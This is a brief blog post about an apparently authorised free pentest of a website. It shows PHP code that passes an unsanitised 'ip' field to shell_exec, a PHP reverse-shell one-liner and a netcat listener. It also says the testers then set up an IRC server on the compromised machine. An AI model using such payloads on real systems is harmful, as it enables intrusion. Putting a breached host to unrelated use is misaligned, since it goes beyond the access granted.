Website input command injection

Someone recently asked for a free pentest in a private security related group for a site they had been working on for a while before it went live. Some of us guys at FALE obliged. Since it was a free pentest, I am taking the liberty to post about it. It was actually my first shell and first box I’ve popped that wasn’t mine. So it was a learning opportunity for me with some subtle direction by those more experienced.

The way it worked was basically, using Burp Suite, I was able to look at the requests made by my browser to the site, then it was a matter of trying various inputs on some of the fields it accepted. This one in particular took a post for an ip field that was set in a hidden field. Below is the php code from the site URL we grabbed once we were in.

    header('Content-Type: text/json');
    echo shell_exec('curl "http://'.$_GET['ip'].'/api/Search?category='.$_GET['category'].'&term='.urlencode($_GET['term']).'"');

As you can see it’s running a straight up shell_exec on a curl command with the ip header field injected with no sanitization or checking format. So it was a simple matter of changing the header field in burp to a remote shell command. PHP worked for obvious reasons, it was already installed.

 `php -r '$sock=fsockopen("",1234);exec("/bin/sh -i <&3 >&3 2>&3");'`

I of course, first setup a simple listener using netcat on the host with the IP in the above command.

 netcat -l -p 1234

and boom, free shells. The machine was pretty well locked down, so escalation from there wasn’t done, and its a free pentest so we’re only going to put so much effort into it. All the same, we had some fun by attempting to setup a Minecraft server, turned out the box didn’t have enough memory, so we settled for setting up an IRC server.

See also